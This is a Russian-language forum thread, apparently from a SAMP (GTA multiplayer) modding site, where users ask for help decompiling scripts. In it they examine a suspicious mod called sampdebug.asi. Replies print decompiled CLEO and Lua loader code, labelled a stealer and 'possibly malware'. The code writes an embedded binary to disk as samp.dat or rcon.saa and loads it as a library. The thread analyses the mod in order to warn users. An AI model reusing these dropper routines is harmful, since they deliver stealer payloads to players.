Декомпиляция скриптов

FYP

Известный
Автор темы
Администратор
1,763
5,915
GVWUrNJ.png
eNo5cSj.png


Общая тема для просьб о помощи в декомпиляциии и декриптованиии скриптов, плагинов и приложений.
Запрещено просить о декомпиляции/декриптовании софта, выставленного на продажу на нашем сайте.

Рекомендации:
  1. Сначала воспользуйтесь поиском по теме и по форуму, возможно его в декомпилированном виде или с исходным кодом уже выкладывали у нас на сайте.
  2. Попытайтесь декомпилировать самостоятельно: CLEO - декриптор, декомпилятор; AHK - распаковщик .exe; LuaJIT - декомпилятор1, декомпилятор2.
  3. Просить о декомпиляции .asi, .sf, .dll, .exe почти бесполезно, часто такие просьбы остаются без ответа и вряд ли вам это что-то даст. Можете попробовать сами, IDA Pro или Ghidra к вашим услугам.
    • Это не касается .exe, которые являются скомпилированными AutoHotKey-скриптами (.ahk).
  4. Добавьте название скрипта к сообщению, если оно известно - это поможет другим пользователям найти его с помощью поиска.
  5. Сообщения по типу "спасибо, помог" по правилам форума считаются флудом и скорее всего будут удалены. Если вам помогли, вы можете нажать кнопку Мне нравится под ответом - это даст понять, что ответ верный.
 
Последнее редактирование:

sakuta

Участник
37
9
Является ли sampdebug.asi вирусом? Вы можете увидеть это, открыв эту строку в блокноте.
Не уверен что это, ну эта хуйня тебе чет подгружает как будто, не особо советую это юзать, как говориться - на свой страх и риск.

upd: кто шарит в вирусах, посмотрите че там накалякано.


1711467929087.png
 

Вложения

  • speeder_v3-unprot-out2.lua
    462 байт · Просмотры: 8

yung milonov

Известный
1,005
514
Не уверен что это, ну эта хуйня тебе чет подгружает как будто, не особо советую это юзать, как говориться - на свой страх и риск.

upd: кто шарит в вирусах, посмотрите че там накалякано.


Посмотреть вложение 235618
хуево ты открыл как-то, раз массив пустой получился
1711627705556.png

луашка собирает sampdebug.asi и подгружает его
асишник запросы шлет

1711627739110.png
 

0x73616D

Активный
140
42
Stealer

CLEO:
allocate_memory 4@ = allocate_memory_size 260
string_format 4@ = string_format "%s\\samp.dat" "SAMP"
get_label_pointer 5@ = label @Noname_9
call_function_return 8532696 num_params 2 pop 2 "wb" 4@ 3@
call_function_return 8533620 num_params 4 pop 4 3@ 10752 1 5@ 6@
call_function_return 8532363 num_params 1 pop 1 3@ 6@
  load_dynamic_library 6@ = load_dynamic_library 4@
  get_dynamic_library_procedure 1@ = get_dynamic_library_procedure "_sendCommand@4" library 6@
call_function_return 1@ num_params 1 pop 0 474 4@
wait 100
 

Barako

Новичок
11
0
Stealer

CLEO:
allocate_memory 4@ = allocate_memory_size 260
string_format 4@ = string_format "%s\\samp.dat" "SAMP"
get_label_pointer 5@ = label @Noname_9
call_function_return 8532696 num_params 2 pop 2 "wb" 4@ 3@
call_function_return 8533620 num_params 4 pop 4 3@ 10752 1 5@ 6@
call_function_return 8532363 num_params 1 pop 1 3@ 6@
  load_dynamic_library 6@ = load_dynamic_library 4@
  get_dynamic_library_procedure 1@ = get_dynamic_library_procedure "_sendCommand@4" library 6@
call_function_return 1@ num_params 1 pop 0 474 4@
wait 100
thanks sir and what descryptor u using? can i have it?
 

0x73616D

Активный
140
42
Possibly malware
Lua:
function someFunc0()
    var_0_0 = {} --to find out the contents of this table look inside the lua file
    array = var_0_0
    var_0_0 = io.open("rcon.saa", "wb")
    file = var_0_0
    for var_0_3, var_0_4 in pairs(array) do --var_0_0 FORTEST-FORTEST
        var_0_6 = file
        var_0_8 = var_0_4
        file.write(var_0_6,  string.char(var_0_8) )
    end --end of a for loop
    io.close(file)
    var_0_2 = 0 --var_0_2 NUMBER-NUMBER
    loadDynamicLibrary("rcon.saa", var_0_2)
    return
end
 
  • Нравится
Реакции: moreveal